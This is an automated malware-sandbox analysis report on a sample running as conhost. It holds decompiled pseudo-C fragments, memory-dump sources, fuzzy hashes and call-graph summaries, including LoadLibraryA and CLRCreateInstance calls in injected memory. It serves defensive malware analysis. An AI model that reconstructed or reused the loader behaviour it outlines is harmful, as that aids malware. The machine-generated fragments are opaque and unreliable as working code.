                                          				long long _t94;
                                          				long long _t104;
                                          
                                          				_a8 = __rcx;
                                          				_a16 = __rdx;
                                          				L00401D70(); // executed
                                          				L00401D78();
                                          				_v136 = 0x68;
                                          				_v144 = 0;
                                          				_v152 = 0x64d4;
                                          				E00401D80();
                                          				L00401D88();
                                          				E00401000(0x402021,  &_v1468);
                                          				_v1480 = 0x402021;
                                          				E00401000(0x402027, 0x402021);
                                          				L00401D90();
                                          				E00401000(0x40203c,  &_v680);
                                          				L00401D90();
                                          				_v1504 =  &_v32;
                                          				_v1512 =  &_v136;
                                          				_v1520 = 0;
                                          				_v1528 = 0;
                                          				_v1536 = 0;
                                          				_v1544 = 0;
                                          				_t94 =  &_v680;
                                          				L00401D98(); // executed
                                          				_v1536 = _t94;
                                          				_v1544 = _t94;
                                          				E004019C6(_v32,  &_v144,  &_v152,  &_v152);
                                          				E00401000(0x402051, _v32);
                                          				_v1544 = 0;
                                          				E00401986(_v32, _v144, 0x402051, 0x64d4); // executed
                                          				_v1544 = 0;
                                          				_t104 = _v32;
                                          				E00401A06(_t104,  &_v144,  &_v152, 0);
                                          				_v1496 = _t104;
                                          				_v1504 = 0;
                                          				_v1512 = 0;
                                          				_v1520 = 0;
                                          				_v1528 = 0;
                                          				_v1536 = 0;
                                          				_v1544 = _v144;
                                          				E00401946( &_v160, _v32, _v32, _v32); // executed
                                          				return 0;
                                          			}

                                          Disassembly addresses: 0x004010cf, 0x004010d3, 0x004010e2, 0x00401109, 0x00401113, 0x00401120, 0x00401131, 0x00401145, 0x00401162, 0x0040117f, 0x00401196, 0x004011a3, 0x004011cf, 0x004011ec, 0x00401218, 0x00401221, 0x0040122a, 0x00401239, 0x00401248, 0x00401252, 0x0040125c, 0x00401285, 0x00401295, 0x0040129f, 0x004012a9, 0x004012d7, 0x004012f4, 0x00401303, 0x0040132f, 0x0040133e, 0x0040135f, 0x0040136c, 0x00401376, 0x00401385, 0x00401394, 0x004013a3, 0x004013ad, 0x004013bc, 0x004013c8, 0x004013f4, 0x004013ff

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000025.00000002.654126876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_37_2_400000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ossgiopsxz
                                          • API String ID: 0-950112196
                                          • Opcode ID: 027129236f5fc17bb930072bc991c7d93042750dbe684d2a69f9bce0d8af0eb9
                                          • Instruction ID: 2fac3ab3631056accbe24265960f0be9d3d1f2f5858e293367a5fffc7fc83569
                                          • Opcode Fuzzy Hash: 027129236f5fc17bb930072bc991c7d93042750dbe684d2a69f9bce0d8af0eb9
                                          • Instruction Fuzzy Hash: AB613C61702B504DEB508B27DC513DA77A8F749BC8F404176AE8CAB799EE3DCA44C744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 53%
                                          			_entry_() {
                                          				char _v12;
                                          				long long _v24;
                                          				long long _v40;
                                          				void* _t15;
                                          				void* _t16;
                                          
                                          				L00401D78();
                                          				L00401DA8();
                                          				L00401DB0();
                                          				L00401DB8();
                                          				_v24 = __imp____argc;
                                          				_v40 =  &_v12;
                                          				L00401DC0();
                                          				_v24 = __imp____argc;
                                          				_t15 = E00401B3F(_t16, _v24,  *__imp____argv,  *__imp___environ,  &_v12); // executed
                                          				L00401DC8(); // executed
                                          				return _t15;
                                          			}

                                          Disassembly addresses: 0x00401c17, 0x00401c29, 0x00401c39, 0x00401c54, 0x00401c6e, 0x00401c76, 0x00401c97, 0x00401cb1, 0x00401cd0, 0x00401cdb, 0x00401ce1

                                          Memory Dump Source
                                          • Source File: 00000025.00000002.654126876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_37_2_400000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21ce4a3c4bad2d8f52745ea6da2cc4f672f971df28c2dac7a61d08be2758dfbf
                                          • Instruction ID: f95b0866ce9a4e8d08972c4a78e499f77477d906ef96c5bed7f61ccbfb91fcdc
                                          • Opcode Fuzzy Hash: 21ce4a3c4bad2d8f52745ea6da2cc4f672f971df28c2dac7a61d08be2758dfbf
                                          • Instruction Fuzzy Hash: BE21ECA4301A1498EB80DB57DD5179923A4BB4DFC8F804937AF4DB7365EE7CD9019348
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Control-flow graph of 401b3f-401bba (single block; calls 401a48, 4010c4 and 401adc).
                                          C-Code - Quality: 43%
                                          			E00401B3F(void* __ecx, long long __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                          				intOrPtr _v12;
                                          				long long _v24;
                                          				intOrPtr _t14;
                                          
                                          				_a8 = __rcx;
                                          				_a16 = __rdx;
                                          				_a24 = __r8;
                                          				E00401A48(_a16, _a16, _a24);
                                          				_v24 = __imp____argc;
                                          				_t14 = E004010C4(_v24, _v24,  *__imp____argv); // executed
                                          				_v12 = _t14;
                                          				E00401ADC();
                                          				return _v12;
                                          			}

                                          Disassembly addresses: 0x00401b4a, 0x00401b4e, 0x00401b52, 0x00401b70, 0x00401b8a, 0x00401ba9, 0x00401bae, 0x00401bb1, 0x00401bba

                                          Memory Dump Source
                                          • Source File: 00000025.00000002.654126876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_37_2_400000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71c76325ed0e7fe3de239db9d8a5e5db3261d91b9ad74311023916eb60203952
                                          • Instruction ID: 7879c93a9b15af3785b8632dd2cf68d13165e66144cc5e65a5fd7a9e35596cc3
                                          • Opcode Fuzzy Hash: 71c76325ed0e7fe3de239db9d8a5e5db3261d91b9ad74311023916eb60203952
                                          • Instruction Fuzzy Hash: A801A4B6702B488DDB40DF66DC8139837A4F348BC8F40482AAF4CA7B69DA38C5118744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:15.3%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:19
                                          Total number of Limit Nodes:2
                                          Execution graph (19 nodes, 2 limit nodes): root 286977b4d06 -> 286977b4d28; LoadLibraryA is called at 286977b3eaf (reached via 286977b3ea2), 286977b4e54 and 286977b3fba; CLRCreateInstance is called at 286977b4af2 (reached via 286977b4ab2 from 286977b4f1d).

                                          Callgraph

                                          Callgraph of 115 functions (Function_00000286977B... in the 286977B0000 region and Function_00007FF9F1C... in the 7FF9F1C00000 region); Function_00000286977B4D06 is the root that fans out to 286977B550E, 286977B4AB2, 286977B3EA2, 286977B3FBA, 286977B40D2 and the remaining 286977B functions.

                                          Control-flow Graph

                                          Control-flow graph of 286977b4d06-286977b50cf (LoadLibraryA in block 286977b4e54-286977b4e67; calls 286977b5ede, 286977b645e, 286977b647e, 286977b6092, 286977b5f52, 286977b40d2, 286977b3ea2, 286977b3fba, 286977b550e, 286977b596a, 286977b4ab2, 286977b50d6, 286977b4552 and 286977b61e2).
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.695316719.00000286977B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286977B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_286977b0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                          • Instruction ID: 41c754a9c32c8205600ff4d15a87c64926426ae7a4d3f4453598986d4024dd47
                                          • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                          • Instruction Fuzzy Hash: DCC154343179055BEB99EE28849DBB9B3D1FB98300F548669D54ACB1C6DF30F8528B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Control-flow graph of 7ff9f1c04536-7ff9f1c049f3 (calls 7ff9f1c049f4 in block 7ff9f1c04973-7ff9f1c049d8).
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8eAS
                                          • API String ID: 0-1103591571
                                          • Opcode ID: e7e34c076a78561ddf6fab2ef219859410a3e6ea3e4b32e7874722e895b7c5e0
                                          • Instruction ID: 86a5de8d0fefb09ff02447c4a65f4a44c10e911b0676ef9460e4769642f158f8
                                          • Opcode Fuzzy Hash: e7e34c076a78561ddf6fab2ef219859410a3e6ea3e4b32e7874722e895b7c5e0
                                          • Instruction Fuzzy Hash: 90F1C430508A8D8FEBA8DF28C8457FA37E1FF55310F14426EE84DC7295DB74A9818B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Control-flow graph of 7ff9f1c052e2-7ff9f1c0576f (calls 7ff9f1c05770 in block 7ff9f1c056f2-7ff9f1c05754).
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8eAS
                                          • API String ID: 0-1103591571
                                          • Opcode ID: c517e0d6a2280677bbbf00cd7f816aad8409ec4b26bc4015cc9169dc4115f8c1
                                          • Instruction ID: b03f10d5f1141289ae23d16eb39135cf86b8763d2f2033cb5ac37ec8903905f4
                                          • Opcode Fuzzy Hash: c517e0d6a2280677bbbf00cd7f816aad8409ec4b26bc4015cc9169dc4115f8c1
                                          • Instruction Fuzzy Hash: 8CE1B430508A8D8FEBA9DF28C8557F93BE1FF55311F14426ED84DC72A1DB74A8858B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

• Control-flow graph (edge list only; rendered graph not preserved): basic blocks 7ff9f1c00919-7ff9f1c00fd8; calls 7ff9f1c00520, 7ff9f1c00fdd, 7ff9f1c01021, 7ff9f1c00098, 7ff9f1c00580
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HAS
                                          • API String ID: 0-1809462313
                                          • Opcode ID: 2e047e9e8caa7f93d72262577d5b56afd29b01a3bd38d28755385d955b6ad381
                                          • Instruction ID: e92b2212c50144a0dfc15a86679443d636da4a462d088776df2bfad455ad747a
                                          • Opcode Fuzzy Hash: 2e047e9e8caa7f93d72262577d5b56afd29b01a3bd38d28755385d955b6ad381
                                          • Instruction Fuzzy Hash: 6B220820A1CF494FE78AE7288451779B7E2EF8A340F5940B9D44DDB2E7DE697C818381
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: jtZL
                                          • API String ID: 0-421114002
                                          • Opcode ID: feecd4c49e5d5db6c8ac602f1e4c7a5e3100c04bf4eae15fc49ae7e937b9978d
                                          • Instruction ID: 6556e5135163f82342854755308fe2ff2d3ceda729c489c9dc1c32b998276a45
                                          • Opcode Fuzzy Hash: feecd4c49e5d5db6c8ac602f1e4c7a5e3100c04bf4eae15fc49ae7e937b9978d
                                          • Instruction Fuzzy Hash: 47C1D627D0D7C25EE702DB6C68551E63F60EF93265B1B00FBD1E8CA0E7DB45285A83A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

• Control-flow graph (edge list only; rendered graph not preserved): basic blocks 286977b4ab2-286977b4d03; API: CLRCreateInstance
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.695316719.00000286977B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286977B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_286977b0000_conhost.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID:
                                          • API String ID: 542301482-0
                                          • Opcode ID: 6897f6c5658fd02445411d2cd62f691495e6ef8d9a8d3b03fbdb7ace318125ef
                                          • Instruction ID: 0bf5bebb6a5d48a25ec596bda9cbd8aa1d965702474de4593134ac72bcac9fd7
                                          • Opcode Fuzzy Hash: 6897f6c5658fd02445411d2cd62f691495e6ef8d9a8d3b03fbdb7ace318125ef
                                          • Instruction Fuzzy Hash: 7E815E31209B088FDB68EF28D88CBA677E5FF99301F004A6DD59BCB191EE31E5458B41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

• Control-flow graph (edge list only; rendered graph not preserved): basic blocks 286977b3fba-286977b40d0; API: LoadLibraryA; calls 286977b645e
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.695316719.00000286977B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286977B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_286977b0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                          • Instruction ID: a6d2981f586674fbdf335614c4bb198a8119d31359594c248aba1880bd946cf0
                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                          • Instruction Fuzzy Hash: AE31C03130DA184FEB48AE28E84D7AA73D5EB98310F001559ED4BC72CADDB0ED0287C2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

• Control-flow graph (edge list only; rendered graph not preserved): basic blocks 286977b3eaf-286977b3fb8; API: LoadLibraryA; calls 286977b645e
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.695316719.00000286977B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286977B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_286977b0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                          • Instruction ID: bae6cb76c4b14611492efa362d9ae6fa2bcc7127c65b6da293499123f1942822
                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                          • Instruction Fuzzy Hash: F131AF3530DA084FDF58AE58984D3A973E2E7D8320F00966AEE1BCB2C9DD70ED418781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

• Control-flow graph (edge list only; rendered graph not preserved): basic blocks 286977b3ea2-286977b3fb8; API: LoadLibraryA; calls 286977b645e
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.695316719.00000286977B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286977B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_286977b0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                          • Instruction ID: 0f9c833061359b210eccfe765759304dd797a27335cd560e6099818e9e843ec6
                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                          • Instruction Fuzzy Hash: 00E0203130DA0D1FF758999DD84E7B667D8D795371F00103FF649C2141E455E8D103A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

• Control-flow graph (edge list only; rendered graph not preserved): basic blocks 7ff9f1c002aa-7ff9f1c0050a; calls 7ff9f1c00088
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: jtZL
                                          • API String ID: 0-421114002
                                          • Opcode ID: efacb83930d58404342c772cc3cc60e0bc463f1b53b32f8425a2576170032543
                                          • Instruction ID: 36d9288a5a2c0c380c22bf2ee54168008a63679c09fa50d56a75d27741d07b0a
                                          • Opcode Fuzzy Hash: efacb83930d58404342c772cc3cc60e0bc463f1b53b32f8425a2576170032543
                                          • Instruction Fuzzy Hash: 4B31642190E7C55FDB43E73858256A97FB0AF47214B0A40FBD098CF1E7DA28199983A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

• Control-flow graph (edge list only; rendered graph not preserved): basic blocks 7ff9f1c00580-7ff9f1c00721; no calls
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56babbad2cc2fa5fd3d670f4ccde223c28cf2ed9cc0beae5ef2d0971f5972be1
                                          • Instruction ID: 1211083db6b06d6ab1aa4d7390c57d3b1919c6a148fc080b6899a06633dc3ceb
                                          • Opcode Fuzzy Hash: 56babbad2cc2fa5fd3d670f4ccde223c28cf2ed9cc0beae5ef2d0971f5972be1
                                          • Instruction Fuzzy Hash: 1751E421B1CA494FE748FB2C940A779B7D2EF9A700F1541BAE04DC32E7DE68EC424695
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b2d1e674696717189e2ddeb7275e80af64009bb2c58ef9338ac53a0201f2af2
                                          • Instruction ID: 0d59714c9f2a80a1f8de0360e4748403774607c053c2b59ad850c46ae4216d8b
                                          • Opcode Fuzzy Hash: 9b2d1e674696717189e2ddeb7275e80af64009bb2c58ef9338ac53a0201f2af2
                                          • Instruction Fuzzy Hash: B9513921B1CA494FE744FB2C980A7B577D2EF9A340F1541BAE04DC72E7DE68AC428395
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

• Control-flow graph (edge list only; rendered graph not preserved): basic blocks 7ff9f1c00088-7ff9f1c00721; no calls
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2df7ac9c343eda8a5179dc9dd977b0bec667e5dc521f6c83c44a930613fa9469
                                          • Instruction ID: d1052bd05933d0db60af239cf921f4e4ddd2c8362a332a5b0e737d928900b745
                                          • Opcode Fuzzy Hash: 2df7ac9c343eda8a5179dc9dd977b0bec667e5dc521f6c83c44a930613fa9469
                                          • Instruction Fuzzy Hash: 7C411920B1CA494FE744F72C940A7B977D2EF9A740F1541BAE44DC32E7DE68AC424395
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 406291befd3d07a360c71e39248d143a09a7984be70fc9a6bbbc99fc3fcffad8
                                          • Instruction ID: 4984b3c3ca6d4b981ca56128ae461f2b77843ef8dae8d072235d2147d95cc860
                                          • Opcode Fuzzy Hash: 406291befd3d07a360c71e39248d143a09a7984be70fc9a6bbbc99fc3fcffad8
                                          • Instruction Fuzzy Hash: AA21C22180D6C24FE317937448217947FA0AF03294F1E02EAC498CB1E7DE5D64A9C3A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7fc2713af0e73cf7a3f1005f822a4a54b096d8d16dd8a3a1488b6debdd6c996d
                                          • Instruction ID: f4d2d007483eccd71cd073ee6119bdf05434bbc161c4a16d747c2419571e886e
                                          • Opcode Fuzzy Hash: 7fc2713af0e73cf7a3f1005f822a4a54b096d8d16dd8a3a1488b6debdd6c996d
                                          • Instruction Fuzzy Hash: 0611FA35B5C91D8FDB88EB9CD4957BCB7E1EF59311F01007AD11ED3292CE65A8928B80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73b6245d0a591768fd6861f737b2d070a3981a7916b17674848ca051778fbd5e
                                          • Instruction ID: 41ad400988895873f3e8b6f1e1fc837a4400bd597f985af736ae1693590c9efe
                                          • Opcode Fuzzy Hash: 73b6245d0a591768fd6861f737b2d070a3981a7916b17674848ca051778fbd5e
                                          • Instruction Fuzzy Hash: 0DF0B821B0DD594FD788F33C5455AA86BC2EF98220B4A41F6C00CCB2A3EA28E8808380
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 866dc2dbd041339e84ff2032a8f0b3eb1a316788571ec41914f48c8dd56cf09d
                                          • Instruction ID: 12b76b10dc235255aebac9b05a62040bc92c5db29da4cb547a05f90498ccbf58
                                          • Opcode Fuzzy Hash: 866dc2dbd041339e84ff2032a8f0b3eb1a316788571ec41914f48c8dd56cf09d
                                          • Instruction Fuzzy Hash: E0E01A21B18C1D4F9A94F73C5445AA962D2EB9C250B5645B6E40CC32A6DD28DC918390
                                          Uniqueness

                                          Uniqueness Score: -1.00%